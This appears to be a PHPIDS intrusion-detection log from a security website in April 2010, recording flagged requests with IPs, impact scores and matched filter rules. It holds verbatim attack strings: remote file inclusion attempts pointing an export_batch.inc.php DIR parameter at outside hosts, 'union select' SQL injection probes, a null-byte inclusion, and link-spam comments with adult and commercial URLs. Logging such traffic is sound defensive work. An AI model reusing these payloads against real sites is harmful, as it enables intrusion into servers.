Page:/i.php?page=reviews/chaosnetworks//include/scripts/export_batch.inc.php?DIR=http://orelhas.pt/images/stories/id1?????
IP:92.240.42.10
Impact:20
Created:2010-04-28 19:39:24
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122814
Name:GET.page
Value:reviews/chaosnetworks//include/scripts/export_batch.inc.php?DIR=http://orelhas.pt/images/stories/id1?????
Page:/i.php?page=reviews/chaosnetworks//include/scripts/export_batch.inc.php?DIR=http://orelhas.pt/images/stories/id1?????
IP:92.240.42.10
Impact:20
Created:2010-04-28 19:39:24
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122809
Name:REQUEST.page
Value:reviews//include/scripts/export_batch.inc.php?DIR=http://orelhas.pt/images/stories/id1?????
Page:/i.php?page=reviews//include/scripts/export_batch.inc.php?DIR=http://orelhas.pt/images/stories/id1?????
IP:92.240.42.10
Impact:20
Created:2010-04-28 19:35:53
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122810
Name:REQUEST.page
Value:reviews/chaosnetworks //include/scripts/export_batch.inc.php?DIR=http://orelhas.pt/images/stories/id1?????
Page:/i.php?page=reviews/chaosnetworks%20%20//include/scripts/export_batch.inc.php?DIR=http://orelhas.pt/images/stories/id1?????
IP:92.240.42.10
Impact:26
Created:2010-04-28 19:35:53
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122811
Name:GET.page
Value:reviews//include/scripts/export_batch.inc.php?DIR=http://orelhas.pt/images/stories/id1?????
Page:/i.php?page=reviews//include/scripts/export_batch.inc.php?DIR=http://orelhas.pt/images/stories/id1?????
IP:92.240.42.10
Impact:20
Created:2010-04-28 19:35:53
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122812
Name:GET.page
Value:reviews/chaosnetworks //include/scripts/export_batch.inc.php?DIR=http://orelhas.pt/images/stories/id1?????
Page:/i.php?page=reviews/chaosnetworks%20%20//include/scripts/export_batch.inc.php?DIR=http://orelhas.pt/images/stories/id1?????
IP:92.240.42.10
Impact:26
Created:2010-04-28 19:35:53
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122807
Name:REQUEST.page
Value:http://www.reiluke.site90.com/index.php?security/hackingillustrated
Page:/i.php?page=http://www.reiluke.site90.com/index.php?%00security/hackingillustrated
IP:84.19.169.162
Impact:10
Created:2010-04-28 18:46:03
Details:
Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39

ID:122808
Name:GET.page
Value:http://www.reiluke.site90.com/index.php?security/hackingillustrated
Page:/i.php?page=http://www.reiluke.site90.com/index.php?%00security/hackingillustrated
IP:84.19.169.162
Impact:10
Created:2010-04-28 18:46:03
Details:
Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39

ID:122805
Name:REQUEST.page
Value:videos/pn12/i.php?page=humor/humor
Page:/i.php?page=videos/pn12/i.php?page=humor/humor
IP:184.73.63.115
Impact:10
Created:2010-04-28 18:30:04
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:122806
Name:GET.page
Value:videos/pn12/i.php?page=humor/humor
Page:/i.php?page=videos/pn12/i.php?page=humor/humor
IP:184.73.63.115
Impact:10
Created:2010-04-28 18:30:04
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:122803
Name:REQUEST.page
Value:videos/pn12/i.php?page=campuses-that-use-irongeek-for-teaching-infosec-in-higher-education
Page:/i.php?page=videos/pn12/i.php?page=campuses-that-use-irongeek-for-teaching-infosec-in-higher-education
IP:184.73.63.115
Impact:10
Created:2010-04-28 18:30:00
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:122804
Name:GET.page
Value:videos/pn12/i.php?page=campuses-that-use-irongeek-for-teaching-infosec-in-higher-education
Page:/i.php?page=videos/pn12/i.php?page=campuses-that-use-irongeek-for-teaching-infosec-in-higher-education
IP:184.73.63.115
Impact:10
Created:2010-04-28 18:30:00
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:122801
Name:REQUEST.codeme
Value:Very interesting sites., <a href= http://technorati.com/people/fossilpurses#1 >fossil purses</a> [url=http://technorati.com/people/fossilpurses#1]fossil purses[/url], 4914,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:26
Created:2010-04-28 15:52:51
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122802
Name:POST.codeme
Value:Very interesting sites., <a href= http://technorati.com/people/fossilpurses#1 >fossil purses</a> [url=http://technorati.com/people/fossilpurses#1]fossil purses[/url], 4914,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:26
Created:2010-04-28 15:52:51
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122798
Name:GET.page
Value:security/louisville-metasploit-class) Friendsof the Podcast: Webhosting services:WebSpeedway Interviewwith Everett Washington Way Professional Services.  Everett specializesin Security program building, with specific focus on SecurityAssessments and Audits.  He has been instrumental in implementingVulnerability and Risk Management Solutions.  We get Everett to talk tous about his experiences and recommendations for building a successfulInformation Security program. Comments are closed. Call with questions or comments about the Podcast (404) 890-5379 Follow Us:<img src=/wp-content/uploads/2010/03/twitter.jpg
Page:/i.php?page=security/louisville-metasploit-class)%0AFriendsof%20the%20Podcast:%0AWebhosting%20services:WebSpeedway%0AInterviewwith%20Everett%20Washington%20Way%20Professional%20Services.%C2%A0%20Everett%20specializesin%20Security%20program%20building,%20w
IP:67.207.201.163
Impact:24
Created:2010-04-28 15:20:31
Details:
Webhosting services:WebSpeedwayInterviewwith Everett Washington Way Professional Services.  Everett specializesin Security program building, with specific focus on SecurityAssessments and Audits.  He has been instrumental in implementingVulnerability and Risk Management Solutions.  We get Everett to talk tous about his experiences and recommendations for building a successfulInformation Security program.
Comments are closed.
 
 

 Call with questions or comments about the Podcast (404) 890-5379  

  Follow Us:<img src=/wp-content/uploads/2010/03/twitter.jpg
Impact: 12 | Tags: xss, csrf, id, rfe, lfi
Description: Detects common XSS concatenation patterns 1/2 | Tags: xss, csrf, id, rfe | ID: 30
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects possibly malicious html elements including some attributes | Tags: xss, csrf, id, rfe, lfi | ID: 38

ID:122799
Name:REQUEST.page
Value:security/louisville-metasploit-class) Friendsof the Podcast: Webhosting services:WebSpeedway Interviewwith Everett Washington Way Professional Services.  Everett specializesin Security program building, with specific focus on SecurityAssessments and Audits.  He has been instrumental in implementingVulnerability and Risk Management Solutions.  We get Everett to talk tous about his experiences and recommendations for building a successfulInformation Security program. Comments are closed. Call with questions or comments about the Podcast (404) 890-5379 Follow Us:<img src=/wp-content/uploads/2010/03/twitter.jpg width=50 /> <img src=/wp-content/uploads/2010/03/itunes2.jpg /> Audio Feed:<img src=/wp-content/uploads/2010/03/RSSBlue1.png
Page:/i.php?page=security/louisville-metasploit-class)%0AFriendsof%20the%20Podcast:%0AWebhosting%20services:WebSpeedway%0AInterviewwith%20Everett%20Washington%20Way%20Professional%20Services.%C2%A0%20Everett%20specializesin%20Security%20program%20building,%20w
IP:67.207.201.163
Impact:32
Created:2010-04-28 15:20:31
Details:
Webhosting services:WebSpeedwayInterviewwith Everett Washington Way Professional Services.  Everett specializesin Security program building, with specific focus on SecurityAssessments and Audits.  He has been instrumental in implementingVulnerability and Risk Management Solutions.  We get Everett to talk tous about his experiences and recommendations for building a successfulInformation Security program.
Comments are closed.
 
 

 Call with questions or comments about the Podcast (404) 890-5379  

  Follow Us:<img src=/wp-content/uploads/2010/03/twitter.jpg width=50 />
<img src=/wp-content/uploads/2010/03/itunes2.jpg /> Audio Feed:<img src=/wp-content/uploads/2010/03/RSSBlue1.png
Impact: 16 | Tags: xss, csrf, id, rfe, lfi
Description: Detects common XSS concatenation patterns 1/2 | Tags: xss, csrf, id, rfe | ID: 30
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects possibly malicious html elements including some attributes | Tags: xss, csrf, id, rfe, lfi | ID: 38
Description: finds attribute breaking injections including obfuscated attributes | Tags: xss, csrf | ID: 68

ID:122800
Name:GET.page
Value:security/louisville-metasploit-class) Friendsof the Podcast: Webhosting services:WebSpeedway Interviewwith Everett Washington Way Professional Services.  Everett specializesin Security program building, with specific focus on SecurityAssessments and Audits.  He has been instrumental in implementingVulnerability and Risk Management Solutions.  We get Everett to talk tous about his experiences and recommendations for building a successfulInformation Security program. Comments are closed. Call with questions or comments about the Podcast (404) 890-5379 Follow Us:<img src=/wp-content/uploads/2010/03/twitter.jpg width=50 /> <img src=/wp-content/uploads/2010/03/itunes2.jpg /> Audio Feed:<img src=/wp-content/uploads/2010/03/RSSBlue1.png
Page:/i.php?page=security/louisville-metasploit-class)%0AFriendsof%20the%20Podcast:%0AWebhosting%20services:WebSpeedway%0AInterviewwith%20Everett%20Washington%20Way%20Professional%20Services.%C2%A0%20Everett%20specializesin%20Security%20program%20building,%20w
IP:67.207.201.163
Impact:32
Created:2010-04-28 15:20:31
Details:
Webhosting services:WebSpeedwayInterviewwith Everett Washington Way Professional Services.  Everett specializesin Security program building, with specific focus on SecurityAssessments and Audits.  He has been instrumental in implementingVulnerability and Risk Management Solutions.  We get Everett to talk tous about his experiences and recommendations for building a successfulInformation Security program.
Comments are closed.
 
 

 Call with questions or comments about the Podcast (404) 890-5379  

  Follow Us:<img src=/wp-content/uploads/2010/03/twitter.jpg width=50 />
<img src=/wp-content/uploads/2010/03/itunes2.jpg /> Audio Feed:<img src=/wp-content/uploads/2010/03/RSSBlue1.png
Impact: 16 | Tags: xss, csrf, id, rfe, lfi
Description: Detects common XSS concatenation patterns 1/2 | Tags: xss, csrf, id, rfe | ID: 30
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects possibly malicious html elements including some attributes | Tags: xss, csrf, id, rfe, lfi | ID: 38
Description: finds attribute breaking injections including obfuscated attributes | Tags: xss, csrf | ID: 68

ID:122797
Name:REQUEST.page
Value:security/louisville-metasploit-class) Friendsof the Podcast: Webhosting services:WebSpeedway Interviewwith Everett Washington Way Professional Services.  Everett specializesin Security program building, with specific focus on SecurityAssessments and Audits.  He has been instrumental in implementingVulnerability and Risk Management Solutions.  We get Everett to talk tous about his experiences and recommendations for building a successfulInformation Security program. Comments are closed. Call with questions or comments about the Podcast (404) 890-5379 Follow Us:<img src=/wp-content/uploads/2010/03/twitter.jpg
Page:/i.php?page=security/louisville-metasploit-class)%0AFriendsof%20the%20Podcast:%0AWebhosting%20services:WebSpeedway%0AInterviewwith%20Everett%20Washington%20Way%20Professional%20Services.%C2%A0%20Everett%20specializesin%20Security%20program%20building,%20w
IP:67.207.201.163
Impact:24
Created:2010-04-28 15:20:30
Details:
Webhosting services:WebSpeedwayInterviewwith Everett Washington Way Professional Services.  Everett specializesin Security program building, with specific focus on SecurityAssessments and Audits.  He has been instrumental in implementingVulnerability and Risk Management Solutions.  We get Everett to talk tous about his experiences and recommendations for building a successfulInformation Security program.
Comments are closed.
 
 

 Call with questions or comments about the Podcast (404) 890-5379  

  Follow Us:<img src=/wp-content/uploads/2010/03/twitter.jpg
Impact: 12 | Tags: xss, csrf, id, rfe, lfi
Description: Detects common XSS concatenation patterns 1/2 | Tags: xss, csrf, id, rfe | ID: 30
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects possibly malicious html elements including some attributes | Tags: xss, csrf, id, rfe, lfi | ID: 38

ID:122795
Name:REQUEST.page
Value:reviews//include/scripts/export_batch.inc.php?DIR=http://geo.metodist.ru/images/id?
Page:/i.php?page=reviews//include/scripts/export_batch.inc.php?DIR=http://geo.metodist.ru/images/id?
IP:199.120.90.223
Impact:20
Created:2010-04-28 15:02:19
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122796
Name:GET.page
Value:reviews//include/scripts/export_batch.inc.php?DIR=http://geo.metodist.ru/images/id?
Page:/i.php?page=reviews//include/scripts/export_batch.inc.php?DIR=http://geo.metodist.ru/images/id?
IP:199.120.90.223
Impact:20
Created:2010-04-28 15:02:19
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122793
Name:REQUEST.page
Value:reviews//include/scripts/export_batch.inc.php?DIR=http://geo.metodist.ru/images/id?
Page:/i.php?page=reviews//include/scripts/export_batch.inc.php?DIR=http://geo.metodist.ru/images/id?
IP:199.120.90.223
Impact:20
Created:2010-04-28 15:01:44
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122794
Name:GET.page
Value:reviews//include/scripts/export_batch.inc.php?DIR=http://geo.metodist.ru/images/id?
Page:/i.php?page=reviews//include/scripts/export_batch.inc.php?DIR=http://geo.metodist.ru/images/id?
IP:199.120.90.223
Impact:20
Created:2010-04-28 15:01:44
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122791
Name:REQUEST.page
Value:reviews/chaosnetworks//include/scripts/export_batch.inc.php?DIR=http://geo.metodist.ru/images/id?
Page:/i.php?page=reviews/chaosnetworks//include/scripts/export_batch.inc.php?DIR=http://geo.metodist.ru/images/id?
IP:199.120.90.223
Impact:20
Created:2010-04-28 15:01:43
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122792
Name:GET.page
Value:reviews/chaosnetworks//include/scripts/export_batch.inc.php?DIR=http://geo.metodist.ru/images/id?
Page:/i.php?page=reviews/chaosnetworks//include/scripts/export_batch.inc.php?DIR=http://geo.metodist.ru/images/id?
IP:199.120.90.223
Impact:20
Created:2010-04-28 15:01:43
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122787
Name:REQUEST.page
Value:reviews/chaosnetworks//include/scripts/export_batch.inc.php?DIR=http://geo.metodist.ru/images/id?
Page:/i.php?page=reviews/chaosnetworks//include/scripts/export_batch.inc.php?DIR=http://geo.metodist.ru/images/id?
IP:199.120.90.223
Impact:20
Created:2010-04-28 15:01:41
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122788
Name:GET.page
Value:reviews/chaosnetworks//include/scripts/export_batch.inc.php?DIR=http://geo.metodist.ru/images/id?
Page:/i.php?page=reviews/chaosnetworks//include/scripts/export_batch.inc.php?DIR=http://geo.metodist.ru/images/id?
IP:199.120.90.223
Impact:20
Created:2010-04-28 15:01:41
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122789
Name:REQUEST.page
Value:reviews//include/scripts/export_batch.inc.php?DIR=http://geo.metodist.ru/images/id?
Page:/i.php?page=reviews//include/scripts/export_batch.inc.php?DIR=http://geo.metodist.ru/images/id?
IP:199.120.90.223
Impact:20
Created:2010-04-28 15:01:41
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122790
Name:GET.page
Value:reviews//include/scripts/export_batch.inc.php?DIR=http://geo.metodist.ru/images/id?
Page:/i.php?page=reviews//include/scripts/export_batch.inc.php?DIR=http://geo.metodist.ru/images/id?
IP:199.120.90.223
Impact:20
Created:2010-04-28 15:01:41
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122785
Name:REQUEST.codeme
Value:What?, <a href= http://technorati.com/people/telemarketingleads#1 >Best telemarketing leads</a> [url=http://technorati.com/people/telemarketingleads#1]Best telemarketing leads[/url], ejkhhu,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:36
Created:2010-04-28 14:05:01
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122786
Name:POST.codeme
Value:What?, <a href= http://technorati.com/people/telemarketingleads#1 >Best telemarketing leads</a> [url=http://technorati.com/people/telemarketingleads#1]Best telemarketing leads[/url], ejkhhu,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:36
Created:2010-04-28 14:05:01
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122783
Name:REQUEST.codeme
Value:What?, http://technorati.com/people/coedsneedcash coeds need cash now, jlw,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:10
Created:2010-04-28 13:15:38
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7

ID:122784
Name:POST.codeme
Value:What?, http://technorati.com/people/coedsneedcash coeds need cash now, jlw,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:10
Created:2010-04-28 13:15:38
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7

ID:122781
Name:REQUEST.codeme
Value:Incredible site!, <a href= http://technorati.com/people/automobileinsurancerules >automobile insurance rules price</a>, [url= http://technorati.com/people/automobileinsurancerules ]automobile insurance rules price[/url], 6797,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:16
Created:2010-04-28 11:35:20
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33

ID:122782
Name:POST.codeme
Value:Incredible site!, <a href= http://technorati.com/people/automobileinsurancerules >automobile insurance rules price</a>, [url= http://technorati.com/people/automobileinsurancerules ]automobile insurance rules price[/url], 6797,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:16
Created:2010-04-28 11:35:20
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33

ID:122779
Name:REQUEST.codeme
Value:Only, <a href= http://technorati.com/people/iamlookingfordiscountairlineti#1 >i am looking for discount airline tickets</a> [url=http://technorati.com/people/iamlookingfordiscountairlineti#1]i am looking for discount airline tickets[/url], xva,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:26
Created:2010-04-28 10:45:08
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122780
Name:POST.codeme
Value:Only, <a href= http://technorati.com/people/iamlookingfordiscountairlineti#1 >i am looking for discount airline tickets</a> [url=http://technorati.com/people/iamlookingfordiscountairlineti#1]i am looking for discount airline tickets[/url], xva,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:26
Created:2010-04-28 10:45:08
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122777
Name:REQUEST.BCSI-AC-4E050338BC5CF7E7
Value:1AAE78F800000005NbR0n41gqisJMk1jmtRCRA8 SAEgAAAABQAAADa8HQCAcAAAAAAAACHVAAA=
Page:/
IP:170.167.4.200
Impact:22
Created:2010-04-28 10:37:34
Details:
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.0769230769231
Converted: ((++:

ID:122778
Name:COOKIE.BCSI-AC-4E050338BC5CF7E7
Value:1AAE78F800000005NbR0n41gqisJMk1jmtRCRA8 SAEgAAAABQAAADa8HQCAcAAAAAAAACHVAAA=
Page:/
IP:170.167.4.200
Impact:22
Created:2010-04-28 10:37:34
Details:
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.0769230769231
Converted: ((++:

ID:122775
Name:REQUEST.codeme
Value:really great sites, thank you, <a href= http://technorati.com/people/prepaidvisatravelcard#1 >prepaid visa travel card here</a> [url=http://technorati.com/people/prepaidvisatravelcard#1]prepaid visa travel card here[/url], %-OO,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:40
Created:2010-04-28 09:55:13
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: ---
Ratio: ---
Converted: ((++::

ID:122776
Name:POST.codeme
Value:really great sites, thank you, <a href= http://technorati.com/people/prepaidvisatravelcard#1 >prepaid visa travel card here</a> [url=http://technorati.com/people/prepaidvisatravelcard#1]prepaid visa travel card here[/url], %-OO,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:40
Created:2010-04-28 09:55:13
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: ---
Ratio: ---
Converted: ((++::

ID:122773
Name:REQUEST.codeme
Value:I have the same., <a href= http://technorati.com/people/hugedildo >Discount huge dildo</a>, [url= http://technorati.com/people/hugedildo ]Discount huge dildo[/url], =-]]],
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:16
Created:2010-04-28 09:05:03
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33

ID:122774
Name:POST.codeme
Value:I have the same., <a href= http://technorati.com/people/hugedildo >Discount huge dildo</a>, [url= http://technorati.com/people/hugedildo ]Discount huge dildo[/url], =-]]],
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:16
Created:2010-04-28 09:05:03
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33

ID:122771
Name:REQUEST.page
Value:backtrack-3 and 0=1 union select -man/ike-scan
Page:/i.php?page=backtrack-3+and+0=1+union+select+-man/ike-scan
IP:58.187.99.244
Impact:20
Created:2010-04-28 08:16:10
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55

ID:122772
Name:GET.page
Value:backtrack-3 and 0=1 union select -man/ike-scan
Page:/i.php?page=backtrack-3+and+0=1+union+select+-man/ike-scan
IP:58.187.99.244
Impact:20
Created:2010-04-28 08:16:10
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55

ID:122769
Name:REQUEST.page
Value:backtrack-3 and 0=1 union select -man/nemesis-ip
Page:/i.php?page=backtrack-3+and+0=1+union+select+-man/nemesis-ip
IP:58.187.99.244
Impact:20
Created:2010-04-28 08:16:06
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55

ID:122770
Name:GET.page
Value:backtrack-3 and 0=1 union select -man/nemesis-ip
Page:/i.php?page=backtrack-3+and+0=1+union+select+-man/nemesis-ip
IP:58.187.99.244
Impact:20
Created:2010-04-28 08:16:06
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55

ID:122767
Name:REQUEST.codeme
Value:best for you, <a href= http://technorati.com/people/retroporn#1 >Discount retro porn</a> [url=http://technorati.com/people/retroporn#1]Discount retro porn[/url], 878904,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:26
Created:2010-04-28 08:15:27
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122768
Name:POST.codeme
Value:best for you, <a href= http://technorati.com/people/retroporn#1 >Discount retro porn</a> [url=http://technorati.com/people/retroporn#1]Discount retro porn[/url], 878904,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:26
Created:2010-04-28 08:15:27
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122765
Name:REQUEST.codeme
Value:Best Wishes, <a href= http://technorati.com/people/homemadesextoys >homemade sex toys free</a>, [url= http://technorati.com/people/homemadesextoys ]homemade sex toys free[/url], :],
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:16
Created:2010-04-28 06:35:21
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33

ID:122766
Name:POST.codeme
Value:Best Wishes, <a href= http://technorati.com/people/homemadesextoys >homemade sex toys free</a>, [url= http://technorati.com/people/homemadesextoys ]homemade sex toys free[/url], :],
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:16
Created:2010-04-28 06:35:21
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33

ID:122763
Name:REQUEST.page
Value:backtrack-3 and 0=1 union select -man/ike-scan
Page:/i.php?page=backtrack-3+and+0=1+union+select+-man/ike-scan
IP:113.169.121.132
Impact:20
Created:2010-04-28 06:32:13
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55

ID:122764
Name:GET.page
Value:backtrack-3 and 0=1 union select -man/ike-scan
Page:/i.php?page=backtrack-3+and+0=1+union+select+-man/ike-scan
IP:113.169.121.132
Impact:20
Created:2010-04-28 06:32:13
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55

ID:122761
Name:REQUEST.page
Value:backtrack-3 and 0=1 union select -man/nemesis-ip
